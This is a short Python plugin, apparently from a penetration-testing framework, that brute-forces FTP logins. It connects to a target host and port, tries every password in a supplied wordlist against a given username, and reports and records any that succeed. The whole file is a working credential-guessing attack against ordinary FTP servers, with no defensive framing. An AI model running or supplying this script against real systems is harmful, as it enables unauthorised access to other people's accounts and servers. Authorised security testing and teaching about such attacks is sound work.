Description = 'Bruteforce FTP Protocol.'

from plugin_support import *

init = {
    'target':ask.target,
    'RPORT':ask.RPORT,
    'USER':ask.USER,
    'PASSLIST':ask.PASSLIST
}

def run():
    global init
    from ftplib import FTP

    try:
	    users = init['USER']
	    passlist = init['PASSLIST']
	    ftp = FTP()
	    ftp.connect(init['target'],int(init['RPORT'])) 

	    with open(passlist,'r') as passwords:
		    for password in passwords:
			    password=password.replace("\n","")
			    try:
				    ftp.login(users,password)
				    if True:
					    success("Successfully with ["+users+"]["+password+"]\n")
					    Space()
					    UTIL.sRegister(init,password)
			    except:
				    fail(" | Checking '"+password+"'")
    except KeyboardInterrupt:
	    exit()
